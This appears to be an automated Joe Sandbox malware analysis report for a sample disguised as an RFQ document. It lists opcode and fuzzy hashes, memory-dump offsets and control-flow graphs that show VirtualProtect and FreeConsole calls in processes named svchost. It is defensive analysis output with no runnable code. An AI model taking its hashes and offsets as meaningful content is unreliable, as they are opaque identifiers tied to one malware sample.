                                                                          • Opcode ID: 0fa189c5ad23023ead5d3297d6cd2b95c208bc2d9b3f597b7f8cdae61b6d7d58
                                                                          • Instruction ID: 0214164435ad8343cea8d1b5c1f50a045f2a15c75ec9f0e1d8d93c78361ea34f
                                                                          • Opcode Fuzzy Hash: 0fa189c5ad23023ead5d3297d6cd2b95c208bc2d9b3f597b7f8cdae61b6d7d58
                                                                          • Instruction Fuzzy Hash: 3941777160D7890FC31E9B7488211B27BA1EB57310B1682BFD487CB1E7EC28AD468392

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670677825.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b980000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: e061f4fe95e53bc049642eb4045608ba86a20c460b1bce62c79466fbcf3e6e99
                                                                          • Instruction ID: 040e8c38f67bccfe2d52176c264d3417d9356650ae752ff9a241c520845f3d2e
                                                                          • Opcode Fuzzy Hash: e061f4fe95e53bc049642eb4045608ba86a20c460b1bce62c79466fbcf3e6e99
                                                                          • Instruction Fuzzy Hash: 1D726971A1FB8A5FE766CB68C8655A87BE0EF51700F0606FED08DCB0A3DA346946C741

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1018 7ffd9b8b3740-7ffd9b8b4906 VirtualProtect 1024 7ffd9b8b4908 1018->1024 1025 7ffd9b8b490e-7ffd9b8b4968 1018->1025 1024->1025
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0fb15fe985c33fdd4edd5bf24ee7267efb3a39aec812dd401811e7ec6e4b7b1
                                                                          • Instruction ID: ca855410ca1db984f78c28da4ba38a6b37242fd1597ac4aa0c89975091cd0c76
                                                                          • Opcode Fuzzy Hash: c0fb15fe985c33fdd4edd5bf24ee7267efb3a39aec812dd401811e7ec6e4b7b1
                                                                          • Instruction Fuzzy Hash: 6361907090975C8FDB58DFA8C895AE9BBF0FF1A300F1041AED049972A2DB74A945CF85

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1121 7ffd9b8b47a6-7ffd9b8b47cf 1122 7ffd9b8b47da-7ffd9b8b4906 VirtualProtect 1121->1122 1123 7ffd9b8b47d1-7ffd9b8b47d9 1121->1123 1127 7ffd9b8b4908 1122->1127 1128 7ffd9b8b490e-7ffd9b8b4968 1122->1128 1123->1122 1127->1128
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 0d5dafb17b1a3b6319ddce7915fdc72e66b744f8f83f521b70924221c024bde2
                                                                          • Instruction ID: 2acf608d2c841fc0181f1fdfbeab180d1004b55fc532fa06fafa9e09ddefc1fd
                                                                          • Opcode Fuzzy Hash: 0d5dafb17b1a3b6319ddce7915fdc72e66b744f8f83f521b70924221c024bde2
                                                                          • Instruction Fuzzy Hash: A2517F7090874C8FDB58DF68C855BE9BBF0FB5A310F1402AED449E3292DB74A985CB81

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1202 7ffd9b8c5d7a-7ffd9b8c9c07 VirtualProtect 1206 7ffd9b8c9c09 1202->1206 1207 7ffd9b8c9c0f-7ffd9b8c9c5d 1202->1207 1206->1207
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 589e6f5076f9fa479f0e32474c5009b4f187664cfbf952e9a8d0c345aac99401
                                                                          • Instruction ID: f151544303ddfb6b3f36b611ed90b3dbf190b23cdcbb284ebd84ee16908fd522
                                                                          • Opcode Fuzzy Hash: 589e6f5076f9fa479f0e32474c5009b4f187664cfbf952e9a8d0c345aac99401
                                                                          • Instruction Fuzzy Hash: 18514C7091861C8FDB58DF98C885BEDBBF1FB59310F10416ED44AE3251DB70A981CB81

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1339 7ffd9b8b0a0d-7ffd9b8b0a19 1340 7ffd9b8b0a1b-7ffd9b8b0a23 1339->1340 1341 7ffd9b8b0a24-7ffd9b8b0adf FreeConsole 1339->1341 1340->1341 1345 7ffd9b8b0ae7-7ffd9b8b0b2d 1341->1345 1346 7ffd9b8b0ae1 1341->1346 1346->1345
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction ID: 71d2dbf544d9073cd60d6865cdffe9edb1fcc2a57ba2bcc038dad54b98bd3e12
                                                                          • Opcode Fuzzy Hash: 7170b1d589fb1e4cd46d72328f8bea376acddda3d1aec330fccaeb790c5df911
                                                                          • Instruction Fuzzy Hash: 1C418F34A0875C8FDB54DFA8C889BEDBBF0FB1A311F1041AAD049D7252DB74A945CB41

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1348 7ffd9b8b04ba-7ffd9b8b0a80 1351 7ffd9b8b0a88-7ffd9b8b0adf FreeConsole 1348->1351 1352 7ffd9b8b0ae7-7ffd9b8b0b2d 1351->1352 1353 7ffd9b8b0ae1 1351->1353 1353->1352
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction ID: f3b48265a86cabe9f69aa6646b10775eeab2eb5e659d0d33d51326bb497cab17
                                                                          • Opcode Fuzzy Hash: 1c33fe11f24b4fb623ea540b2fc1b5c9f33731fc83a00bc69aeb2da1f8d65f2a
                                                                          • Instruction Fuzzy Hash: 98316A74A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A985CB50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FS:$FS:
                                                                          • API String ID: 0-4179540653
                                                                          • Opcode ID: e74bf6787a53a3dbe3e243c2f5c0d68025273587ac8ae0bdc1826d2116911a8b
                                                                          • Instruction ID: de8cf527cd1c5ebb6776c9e647c5911ae4e8126b84d0c0959355f30d6cafa844
                                                                          • Opcode Fuzzy Hash: e74bf6787a53a3dbe3e243c2f5c0d68025273587ac8ae0bdc1826d2116911a8b
                                                                          • Instruction Fuzzy Hash: 4481B430A09A8D8FDBA8DF28C856BE977E1FF59310F14412EE84DC7292DB749945CB81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1
                                                                          • API String ID: 0-2212294583
                                                                          • Opcode ID: ba25f2859f312bdd66d9c59300b22336a8e2918951884c960f931b3fbb0776e8
                                                                          • Instruction ID: 0166ede28bd95649eab530d32d61a925c1780a9c34dd997a2b57a977d4ad6705
                                                                          • Opcode Fuzzy Hash: ba25f2859f312bdd66d9c59300b22336a8e2918951884c960f931b3fbb0776e8
                                                                          • Instruction Fuzzy Hash: FCD14853A0F6E60BE72657BC6C791F97F90EF5626470A04FBC0988B0E7D809690A87C1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1670378255.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd9b8b0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3ae4a3856a89dc8cd407d0c3ffa570e35b650e2fd575a999f845d3b4571fbdd
                                                                          • Instruction ID: ee477c574bf451ab53f099f54c71c7c03cb67b62b69060232600af782eac71a8
                                                                          • Opcode Fuzzy Hash: e3ae4a3856a89dc8cd407d0c3ffa570e35b650e2fd575a999f845d3b4571fbdd
                                                                          • Instruction Fuzzy Hash: 40512872A0E3C50FD31A9B7988664B17FA5DF8722070A82FFD0C6CB1A7E515680BC391

                                                                          Execution Graph

                                                                          Execution Coverage:11.5%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:100
                                                                          Total number of Limit Nodes:9

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 441 7ffd9b883740-7ffd9b884906 VirtualProtect 447 7ffd9b88490e-7ffd9b884968 441->447 448 7ffd9b884908 441->448 448->447
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e18a69a343682144af7a627a0bce0573d0a2dcec357953ae9b1446aea668d37
                                                                          • Instruction ID: 098e8e6b546b0d5cd617a77b203745698a4e5421bedb63b616375d4717016522
                                                                          • Opcode Fuzzy Hash: 5e18a69a343682144af7a627a0bce0573d0a2dcec357953ae9b1446aea668d37
                                                                          • Instruction Fuzzy Hash: 62618170909B4C8FDB58EF98C895AE9BBF0FF19310F1041AED059972A2DB74A941CB41

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 544 7ffd9b8847a6-7ffd9b8847cf 545 7ffd9b8847d1-7ffd9b8847d9 544->545 546 7ffd9b8847da-7ffd9b884906 VirtualProtect 544->546 545->546 550 7ffd9b88490e-7ffd9b884968 546->550 551 7ffd9b884908 546->551 551->550
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f2997479f0f2e8eea82eed9a219091bccb2cd6a0c15f5311b692da3812c2ed72
                                                                          • Instruction ID: 9f528366f551fe0ca2ee992eb64315967b4d5c26dae76075c0a6238e06a822a8
                                                                          • Opcode Fuzzy Hash: f2997479f0f2e8eea82eed9a219091bccb2cd6a0c15f5311b692da3812c2ed72
                                                                          • Instruction Fuzzy Hash: 81517F7090874C8FDB58DF68C855BE9BBF1FB5A310F1402AED049E3292DB74A881CB41

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 554 7ffd9b895d7a-7ffd9b899c07 VirtualProtect 558 7ffd9b899c09 554->558 559 7ffd9b899c0f-7ffd9b899c5d 554->559 558->559
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 1251cf25156c06b9b1abd56414be1d13e4c5e447eeb97e0446510d4c04f94fbe
                                                                          • Instruction ID: 8eeda2b4b546946926a74824f2c0a0199592a5e0c8ccff4f071bac3f0ad03652
                                                                          • Opcode Fuzzy Hash: 1251cf25156c06b9b1abd56414be1d13e4c5e447eeb97e0446510d4c04f94fbe
                                                                          • Instruction Fuzzy Hash: 5B512874918A1C8FDB58DF98C885BEDBBF1FB69314F10426ED44AE3251DB70A981CB81

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b880a0d-7ffd9b880a19 -> 7ffd9b880a1b-7ffd9b880a23 or 7ffd9b880a24-7ffd9b880adf; 7ffd9b880a1b-7ffd9b880a23 -> 7ffd9b880a24-7ffd9b880adf (calls FreeConsole) -> 7ffd9b880ae1 or 7ffd9b880ae7-7ffd9b880b2d; 7ffd9b880ae1 -> 7ffd9b880ae7-7ffd9b880b2d.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: a77df8943f9ddad278ac432f1cf19260f7837383567197514d62bf189222af45
                                                                          • Instruction ID: f8900d5a8cd6790f8d3c20e70e411b835f9b907359b6847885d90f5de41aa298
                                                                          • Opcode Fuzzy Hash: a77df8943f9ddad278ac432f1cf19260f7837383567197514d62bf189222af45
                                                                          • Instruction Fuzzy Hash: 62418F34A0875C8FDB54DF98C889BEDBBF0FB1A311F1002AAD049D7252DB74A945CB41

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8804ba-7ffd9b880a80 -> 7ffd9b880a88-7ffd9b880adf (calls FreeConsole) -> 7ffd9b880ae1 or 7ffd9b880ae7-7ffd9b880b2d; 7ffd9b880ae1 -> 7ffd9b880ae7-7ffd9b880b2d.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2009551549.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b880000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 389b9f4190c45f875ebad5a1bae35767b6a8ee0501bdde4bca3a79c678f09d6d
                                                                          • Instruction ID: 652b5139ec7cbeae02e895c8ef6ac3f265438811d7997db50b912ece0659f08a
                                                                          • Opcode Fuzzy Hash: 389b9f4190c45f875ebad5a1bae35767b6a8ee0501bdde4bca3a79c678f09d6d
                                                                          • Instruction Fuzzy Hash: 10316C74A08B1C8FEB54DF98D889BEDB7F0FB19311F10426AD00AE7252DB74A945CB50

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). The listed basic blocks span 7ffd9b9501f2-7ffd9b9503e1; no API call appears on any block.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2010261542.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b950000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 90fa9a49c01ecb2fcdf1b0e8748483793304b74c24f412086b12f00ee92532c3
                                                                          • Instruction ID: bab7ef504c7ada31db0fc9616448fc2f5dcb99b7f4fac987581718be76a17679
                                                                          • Opcode Fuzzy Hash: 90fa9a49c01ecb2fcdf1b0e8748483793304b74c24f412086b12f00ee92532c3
                                                                          • Instruction Fuzzy Hash: 33619E30A1DA8D8FDB6ADF58C861AF87BE0FF55304F1505AED44ECB192CA75A942C740
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2010261542.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd9b950000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d51fe118379f3b866095e7569d91f1c39e57e5f0cf2c633a751134ccf24b10d
                                                                          • Instruction ID: 7a10e899aeae7a174a68fe3bdc2162b1bbea783f4f28e63bea3a01dcfcddfe01
                                                                          • Opcode Fuzzy Hash: 6d51fe118379f3b866095e7569d91f1c39e57e5f0cf2c633a751134ccf24b10d
                                                                          • Instruction Fuzzy Hash: A8313B3155EA9D4FDB1ADF64C8650B43BB1FF16304B0642ABD44ACB0E7DA69B942C740

                                                                          Execution Graph

                                                                          Execution Coverage: 10.3%
                                                                          Dynamic/Decrypted Code Coverage: 100%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 79
                                                                          Total number of Limit Nodes: 4
                                                                          • Rendered execution graph omitted. Its nodes are code addresses between 7ffd9b8a04ba and 7ffd9b8b9c09; the only API calls on the recorded paths are VirtualProtect (reached from 7ffd9b8a0590, 7ffd9b8a3653, 7ffd9b8a3670, 7ffd9b8a3740, 7ffd9b8a3749, 7ffd9b8a4869 and 7ffd9b8b9af0) and FreeConsole (reached from 7ffd9b8a0a30).

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). The listed basic blocks span 7ffd9b9701f2-7ffd9b970cfe; no API call appears on any block.
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: cc3987cd2a9fb9d711924ab44e78ad9f792ad3ba54f73d83a30ea9ee732b82c3
                                                                          • Instruction ID: 3405ddc5a8cb773090993712d7b4ae703d9b53984adee5d02067f6c2b46c1c7c
                                                                          • Opcode Fuzzy Hash: cc3987cd2a9fb9d711924ab44e78ad9f792ad3ba54f73d83a30ea9ee732b82c3
                                                                          • Instruction Fuzzy Hash: 93728C31A1E7895FDF65CB68C8A55A47FE0FF95700F0A06FED08DCB1A2DA246906C781

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8a3740-7ffd9b8a4906 (calls VirtualProtect) -> 7ffd9b8a4908 or 7ffd9b8a490e-7ffd9b8a4968; 7ffd9b8a4908 -> 7ffd9b8a490e-7ffd9b8a4968.
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 87891662af74d9234ff53513049f8acededd8650d87da73cd6395334819e227e
                                                                          • Instruction ID: 412ca4980512ac1602c24f685036820044ed0c5f76e3e70ba9c18e54248caf32
                                                                          • Opcode Fuzzy Hash: 87891662af74d9234ff53513049f8acededd8650d87da73cd6395334819e227e
                                                                          • Instruction Fuzzy Hash: 8891E4B190D68C8FDB59DF98D8A5AE87BF0FF16314F0401BED089972A3EA346945CB41

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8a47a6-7ffd9b8a47cf -> 7ffd9b8a47d1-7ffd9b8a47d9 or 7ffd9b8a47da-7ffd9b8a4906; 7ffd9b8a47d1-7ffd9b8a47d9 -> 7ffd9b8a47da-7ffd9b8a4906 (calls VirtualProtect) -> 7ffd9b8a4908 or 7ffd9b8a490e-7ffd9b8a4968; 7ffd9b8a4908 -> 7ffd9b8a490e-7ffd9b8a4968.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 177e845c0d66ac708e524cc20289556cd677f5e8c4ba8a7afb3c2348e5374c02
                                                                          • Instruction ID: c5aba688bf4c1b375049b4bf32ac1a23a94522d8f6695c9398ed74e6d9bfed62
                                                                          • Opcode Fuzzy Hash: 177e845c0d66ac708e524cc20289556cd677f5e8c4ba8a7afb3c2348e5374c02
                                                                          • Instruction Fuzzy Hash: 48517F7090874C8FDB58DF68C895BE9BBF0FB5A310F1442AED049E3292DB74A885CB41

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8b5d7a-7ffd9b8b9c07 (calls VirtualProtect) -> 7ffd9b8b9c09 or 7ffd9b8b9c0f-7ffd9b8b9c5d; 7ffd9b8b9c09 -> 7ffd9b8b9c0f-7ffd9b8b9c5d.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: b814a722f4dab48a100f94a665e05b3ee0f650a0d81f61a330cb18c8505532da
                                                                          • Instruction ID: 7480ef5e584ce30629708b8527eb9e55ae1cc6a212bd87b67aaa172c4afb7595
                                                                          • Opcode Fuzzy Hash: b814a722f4dab48a100f94a665e05b3ee0f650a0d81f61a330cb18c8505532da
                                                                          • Instruction Fuzzy Hash: EA513A7091861C8FDB58DF98C889BEDBBF1FB69310F10426ED44AE3251DB70A981CB81

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8a0a0d-7ffd9b8a0a19 -> 7ffd9b8a0a1b-7ffd9b8a0a23 or 7ffd9b8a0a24-7ffd9b8a0adf; 7ffd9b8a0a1b-7ffd9b8a0a23 -> 7ffd9b8a0a24-7ffd9b8a0adf (calls FreeConsole) -> 7ffd9b8a0ae1 or 7ffd9b8a0ae7-7ffd9b8a0b2d; 7ffd9b8a0ae1 -> 7ffd9b8a0ae7-7ffd9b8a0b2d.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 5dc6d9aaa757d76c70d49a5396d6ec0cd4e8d21fb71b9ad02441eb8f8acd071d
                                                                          • Instruction ID: 5baf194f44b338c55ecad333380663aeb053750f55ca5f05eb54cccbf1d605c9
                                                                          • Opcode Fuzzy Hash: 5dc6d9aaa757d76c70d49a5396d6ec0cd4e8d21fb71b9ad02441eb8f8acd071d
                                                                          • Instruction Fuzzy Hash: D0418F34A0875C8FDB54DF98D889BEDBBF0FB1A311F1001AAD049D7292DB74A945CB51

                                                                          Control-flow Graph

                                                                          • Rendered graph omitted (executed/not-executed block colouring is not recoverable from the text). Blocks: 7ffd9b8a04ba-7ffd9b8a0a80 -> 7ffd9b8a0a88-7ffd9b8a0adf (calls FreeConsole) -> 7ffd9b8a0ae1 or 7ffd9b8a0ae7-7ffd9b8a0b2d; 7ffd9b8a0ae1 -> 7ffd9b8a0ae7-7ffd9b8a0b2d.
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1969659352.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0
                                                                          • Opcode ID: 69c462d13083fb14242d3baa2a2989662032da44aea96315fd0228cc75da8a4d
                                                                          • Instruction ID: 2817f09ccf70d877e423d951d9c9eca740b244cc188c672a5da6979135c399b6
                                                                          • Opcode Fuzzy Hash: 69c462d13083fb14242d3baa2a2989662032da44aea96315fd0228cc75da8a4d
                                                                          • Instruction Fuzzy Hash: 43314774A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A986CB50
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8890e8c0b674af97a38318c3cdb423636b07536566b0870ade05e86a9788f76
                                                                          • Instruction ID: 1c6b627dbdab4dae97c32f94490dd1dcdcc8e5c7f6a49c2054bacabe74038651
                                                                          • Opcode Fuzzy Hash: c8890e8c0b674af97a38318c3cdb423636b07536566b0870ade05e86a9788f76
                                                                          • Instruction Fuzzy Hash: 50524A31A1F7D95FD766DB6888A55A47FE0EF56304B0A02FFD4C9CB0A3DA14A906C381
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f479dfa262346e44a5e99cca58182ae8353678a5d480ddf3a3a955f4abfef33a
                                                                          • Instruction ID: 8e02854ff1f5156515157645e79671cf57781c21fa8b63dddbfa08aed4e92d89
